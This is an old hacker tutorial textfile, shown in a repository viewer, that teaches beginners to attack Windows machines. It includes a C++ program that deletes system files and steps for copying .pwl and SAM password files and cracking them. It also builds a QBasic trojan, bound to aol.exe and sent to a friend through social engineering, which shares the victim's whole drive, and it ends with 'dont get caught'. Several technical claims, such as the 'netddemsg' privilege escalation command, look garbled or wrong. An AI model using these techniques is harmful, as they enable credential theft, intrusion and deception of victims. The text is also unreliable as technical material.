informis
/
textfiles
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
textfiles/uploads/beginners.txt

555 lines
17 KiB
Plaintext
Raw Permalink Blame History

Hacking Windows
for
The Complete Newbie
Part 1
By: SLIPStream (formerly known as Morbos or Dynamite)
Contact information located at the end of the file.
(Please note: Newbie is not meant to be used
as a put down. All great hackers were once
newbies so please dont get POed) :)
WARNING: This file contains some elements which
are considered illigal in most countries including
the united states. The author assumes no responsiblity
for the actions of the reader after reading this file.
The reader hereby understands that the file is for
educational purposes ONLY. The author does not encourage
illigal activity and cannot be held responsible for the
readers actions. If you agree to this, procede in reading
the file, otherwise, please exit now.
Lesson 1: The Windows FileSystem
Ok. Unless you know virtualy nothing about hacking,
skip this lesson, it is only meant to be used for
the very beginners k? Thanks alot.
Heres the layout of the windows filesystem:
C:\ <--- Can be replaced with any other drive letter eg: e, f, a, b
|_ > C:\windows
> \_> System Files
> \_> Other files used by windows
> \_> Dont delete anything in here.
> C:\Program Files
> \_> Used by programs
> \_> Dont alter these unless you want to
> > Uninstall them
> \_> .dll files stored here for programs
> C:\DOS
> \_> This directory only exists on REAALLY old
> \_> Windows systems ie: win95 in its early editions
> \_> or win 3.1 (i hope nobody still has that.)
Easy enough eh? Open up My Computer and click on C:\ or whatever your
main drive is. Explore it, and when your ready, move on to the next
lesson.
Lesson 2: Exploiting Windows
Windows is so cruddy, even someone new to computers could mess
with it! Lets start. Ok, first you need to know some file extentions:
.exe an executable file
.bat a batch file (full of dos commands)
.html an html file used for webpages
.htm ' ditto '
.dll a dynamic link library file. used for
program instructions
.obj object file, used for compiling
(dont worry about it right now)
.jpg an image file
.bmp ' ditto '
.gif ' ditto ' or an animated image file
.mp3 sound file
.wav older sound file
.mpg video file
.swf a flash video file (neat)
You can find lots more. If your not getting all this, you probably
want to get windows for dummies. Its available at barns and nobles
pretty cheap in the computer section.
Ok. Procede ONLY if you understand all this otherwise you'll screw
your computer over.
First of all download a c/c++ compiler. If you dont know what that is
then dont procede.
Once you know how to compile stuff and write some simple programs,
go to the next subsection (A).
A: Your first exploitation.
Ok, put this into your c++ compiler.
/* This program will completely kill windows
so DO NOT run it */
#include <iostream>
#include <dos.h>
#include <stdlib.h>
#include <conio.h>
using namespace std;
void pause();
void destroy();
int main()
{
cout << "This will destroy your computer.\n";
cout << "Are you sure you want to continue???\n";
cout << "If not, click X now.\n";
pause();
cout << "Are you really really sure??? \n";
pause();
destroy();
return 0;
}
void pause()
{
system("pause");
}
void destroy()
{
system("if exist c:\win.ini del c:\win.ini else echo .");
system("if exist c:\windows.ini del c:\windows.ini else echo .");
}
Compile it and build/link it. DO NOT RUN IT!!!
If you run this and press enter twice it will kill your computer.
What does this do???
First of all:
/* This program will completely kill windows
so DO NOT run it */
Is nothing but a statement. The compiler disregards it.
Then:
#include <iostream>
#include <dos.h>
#include <stdlib.h>
#include <conio.h>
These statements are calling header files. Header files
contain the information used to call c/c++ commands.
void pause();
void destroy();
To use a function other than main, you must declare it so that
the system can allocate memory for it.
int main()
{
cout << "This will destroy your computer.\n";
cout << "Are you sure you want to continue???\n";
cout << "If not, click X now.\n";
pause();
cout << "Are you really really sure??? \n";
pause();
destroy();
return 0;
}
This is the main program where we call the other functions.
void pause()
{
system("pause");
}
This is the pause function. Here we used the dos command pause which
is called from the main program.
void destroy()
{
system("if exist c:\win.ini del c:\win.ini else echo .");
system("if exist c:\windows.ini del c:\windows.ini else echo .");
}
This is the main part of the program where it deletes the win.ini file on XP/NT/2000
or windows.ini on win3x or win9x (3.1 is 3x, and win95/98/2000 are 9x).
I strongly do not advise running this program. If you cannot see why
then you need to learn more about c++.
If all this was too complecated for you you could write it in QBasic, which
requires downloading another compiler (this one is small so you can download
it on 56k dialup).
B: Breaking into the library exploit
I call this the breaking into the library exploit because it lets you break into
anyones account on a windows machine but only allows read access.
(quick lesson on access:
read: users can only read from the file, but cannot write to
write: users can write to the file
no access: users cannot read or write to the file. )
Ok. Open up the DOS prompt. (You need to know some dos commands to use this
exploit).
When the prompt comes up type this:
c:\windows> cd c:\windows\profiles
Do not type the c:\windows> part, this only represents the command prompt.
Now type:
c:\windows\profiles> dir
(Notice \profiles has now been added to c:\windows)
Something like this should come up:
12/18/2003 05:52 AM <DIR> .
12/18/2003 05:52 AM <DIR> ..
12/17/2003 07:04 PM <DIR> administrator
11/17/2003 09:16 PM <DIR> All Users
12/04/2003 03:59 PM <DIR> funnyguy
12/20/2003 06:33 AM <DIR> anotheruser
12/27/2003 10:44 PM <DIR> someuser
0 File(s) 0 bytes
7 Dir(s) 3,671,572,480 bytes free
Well, this gives you an idea on who is on the computer.
Now type:
c:\windows\profiles> cd funnyguy
c:\windows\profiles\funnyguy> dir |more
Something like this will come up:
Volume in drive C has no label.
Volume Serial Number is ECB8-7534
Directory of E:\Documents and Settings\funnyguy
12/27/2003 10:44 PM <DIR> .
12/27/2003 10:44 PM <DIR> ..
11/18/2003 05:58 PM <DIR> .java
11/22/2003 12:30 AM <DIR> .jpi_cache
11/19/2003 08:57 PM <DIR> .limewire
12/26/2003 12:25 AM 697 .plugin141_05.trace
12/24/2003 01:53 PM 4,754 ac3dprefs.txt
12/18/2003 01:30 PM 0 annoy.cpp
12/17/2003 04:52 PM 42,967 arena.cpp
12/17/2003 04:52 PM 3,389 arena.dsp
12/17/2003 04:52 PM 535 arena.dsw
12/17/2003 04:52 PM 34,026 arena.h
12/17/2003 04:52 PM 33,792 arena.ncb
12/17/2003 04:52 PM 48,640 arena.opt
12/17/2003 04:52 PM 1,278 arena.plg
12/16/2003 06:23 PM <DIR> attacker
12/27/2003 07:19 PM <DIR> AWSGuitarTuner_Windows
12/16/2003 06:15 PM <DIR> battlepong
12/17/2003 04:30 PM <DIR> cheat260
12/17/2003 04:22 PM <DIR> crypt3
12/23/2003 09:07 PM <DIR> dc_40_stand_eng
12/25/2003 10:28 AM <DIR> Debug
12/28/2003 12:26 AM <DIR> Desktop
12/15/2003 06:31 PM <DIR> Favorites
12/16/2003 06:15 PM <DIR> fedup
12/16/2003 04:49 PM <DIR> grok
12/16/2003 07:03 PM <DIR> hacker1_1
12/27/2003 09:27 PM <DIR> Ktulu40
12/17/2003 05:07 PM <DIR> midiedit
12/17/2003 04:40 PM <DIR> musiced
12/28/2003 12:27 PM <DIR> My Documents
Hmm? Whats all this??? His/Her personal files???!!!
Do a little browsing.
WINDOWS XP USERS READ THIS:
Windows XP/NT has better security than 9x from
the dos console, but this same exploit can be applied by
doing it from explorer. Open up Internet Explorer (or whatever
web browser you use), and in the adress bar type:
c:\documents and settings
Then press enter.
Ah. There we are!
The same thing, but graphical!
Lesson 3: Starting to get a little more technical.
Ok, you know how to break into windows the easy way. But you dont have write
access. Or maybe you want to break into some school computers but these
exploits wont work.
Lets get started!
There are two vital file types to logging in on windows:
.pwl
and
SAM
The .pwl files contain much weaker encryption than the SAM file,
so it will be easier to obtain them and crack them than the SAM file.
Ok, heres how you do it. If the computer/s you want to hack have
windows 3x or 9x on them, you can use this exploit:
Step 1: Insert a blank floppy into the drive.
Step 2: Start -> Run -> command -> press enter.
Step 3: c:\windows> copy c:\windows\*.pwl a:\
Step 4: Crack them with Cain and Abel password cracker
and you've just broken into some accounts.
Wait! How did you do that?
Ok, heres the overview of the exploit.
All the users password files are contained in
their own little .pwl file (ie: john.pwl, sally.pwl,
funnyguy.pwl).
But you cant just go and read these files. They're
encrypted so they cant be read. However, there are
programs out there that can break these filetypes.
Go to http://www.google.com and type
'cain and able password cracker'
The website should be one of the first ones on the
list. When you get to their website, download the
Cain and Abel password cracker and get to work.
It usualy takes 1 - 2 hours to crack the password
files depending on how big the password is.
First the cracker tries all these words out of its
dictionary to try and find single word passwords.
If none of the words in its dictionary are passwords
(there are thousands of words in there), then it
brute forces the password file (tries a, then b, etc.)
Thats how you break into an account on 9x. Heres how you do
it on xp/NT.
What is the SAM file?
The Sam file is the file containing the encrypted
passwords of all the users on the system. Unlike win 9x where
all users have seperate .pwl files, the SAM file contains all
the users pwl. Basicly, if you have access to the sam file,
you win.
The sam file is actualy hidden (Much better security then 9x),
but when settings are changed on the computer, the sam file is
updated and moved to a new directory accessable to any user.
The folder is E:\WINDOWS\system32\config
If the SAM file isn't there and you have access to the machine
at the console then you can run a search for the SAM file.
Open the Start Menu, click Search, then click on All Files,
and type the Query as 'SAM'. It will run you through some boring
sample files that windows provides, then somewhere in the middle
it will have a file simply named 'sam', no file extention.
Right click on it and click 'Open Containing Folder'. You should
see the sam file in there along with lots of other configuration
files.
Put your floppy in there, right click on 'sam' and click Send to->
Floppy (A:\). In a few seconds you should have your encrypted password
file. BUT! You cannot use Cain and Abel to crack this one. Instead, a
new program is required.
The Program is called L0phtCrack. Download the trial version from
http://www.atstake.com and crack that sam file. This will generaly
take longer than the .pwl files since all the users passwords are
combined into one file.
Windows 2000 Vulnerability:
If you have access to a machine running windows 2000 and have
limited access to it, there is a simple command you can use to make
it give you Super-User privilages on the command prompt. Type:
C:\ netddemsg -s Chat$ cmd.exe
You should now have super user privilages on a 2000 machine!
Lesson 4: Viruses, Trojans, and Worms (oh my! :) )
This section contains code that can damage or destroy your computer.
Please do not use any of the information contained in this section.
It is only for educational purposes.
Ok, pretend you dont want any privilages on a persons machine, but you
just want to screw it up or play a prank on them.
How do you do this? Pretend the person has AOL (The crappiest isp
out there) and they have windows xp. Lets write some code in QBasic.
(Note: No matter what people say, QBasic is the coolest programing language
(besides java and c++) out there).
Heres the code for file 1:
rem '#############Start Copying##############
print "Please wait while AOL is updated... "
shell "cd\windows"
open "win.ini" for output as #1
let loop# = 0
dim line1 as string
dim line1 as string
dim line3 as string
line1 = "[WAOL]"
line2 = "AppPath=E:\Program Files\America Online 9.0"
line3 = "SharedPath=E:\"
dim blank as string
blank = " "
print #1, line1
print #1, line2
print #1, line3
while loop# < 200
print #1, blank
wend
rem '#############Stop Copying###############'
Save the file as update.bas then compile it under qbasic.
Ok, now you need a copy of the america online main file, just use the
aol exe file (C:\program files\America Online 9.0\aol.exe). Install
aol 9.0 optimized using one of those crappy aol disks you have then
copy aol.exe to your desktop.
Copy update.exe (the compiled version of update.bas) to your desktop.
Now download a file binder. You can get one from http://www.hackers.com
in their file archive, or you can get one from http://www.astalavista.com
Either one has some good file binders. You can also do a google search
for one.
Once you have your file binder, have it bind aol.exe and update.exe together,
where as update.exe runs in the background and is not shown on the task bar.
Name the binded file game.exe or fun.exe, maybe even screensaver.exe. Be
creative.
Now comes the fun part!
Talk to your friend on aim and get him/her to let you send him/her the file.
Tell them that it is some game or screen save that they like and want. Be
persuasive and convincing. When they agree you can open a direct link from
your computer to theirs from aim. This will alow you to send the file.
Before you send it open up your command prompt and WITHOUT PRESSING ENTER type
c:\windows> netstat -r
Go back to aim, and be prepared to jump to the command prompt. Send the file
to your friend and quickly click on the command prompt to maximize it and press
enter!!! If you have a fast connection, it will have gotten the IP adress of your
friend. This IP adress is what will be used to break in.
What was all this for???
An IP address (Internet Protocol Address) is how your computer is
identified on the internet. It should look something like this:
65.45.12.54
By obtaining the ip adress of your friend, you have found where his computer
is located on the internet. The program you wrote shares your friends entire
hard drive allowing you to do anything you want with it, upload, download,
see if your friend has been looking at naughty things on the internet and
whatnot.
The peice of code that made all this possible was:
SharedPath=E:\
Normaly, AOL shares its folder E:\Program Files\Common Files\AOLSHARE
Which is the AOL shared folder (doi :) ). Its not much help to only have
that folder shared, but now you have the entire hard disk shared. If you
want to, you could do whatever you want to his hard drive.
How do I find stuff they've been doing?
Well, there are several folders containing the history and past
of the computer. First of all comes history. This is located in
C:\Documents and Settings\username\Recent
If you dont know what username your friend is under go to
c:\documents and settings and find out.
You cant just look at the cookies (accept for under 9x).
You need to open up their internet explorer:
E:\Program Files\Internet Explorer\IExplore.exe and click
on cookies. Im not gonna cover all this right now.
I Hope this file was alot of help and enough to get
you started! Have fun, and dont get caught!
Contact information:
E-Mail:
blackfire@dangerous-minds.com <- please use this one
blackfire@phayze.com
morbos@white-star.com
For Other information:
slipstream_node@yahoo.com
Website:
dataflux.cjb.net
My Email Service:
Please request an account. I dont want to overload
my disk quota. Please contact me to request an
account. Unauthorized accounts will be deleted.
http://wwww.mysticism.zzn.net (username@mysticism.zzn.net)
Yahoo IM:
SLIPStream_node
Reference in New Issue View Git Blame Copy Permalink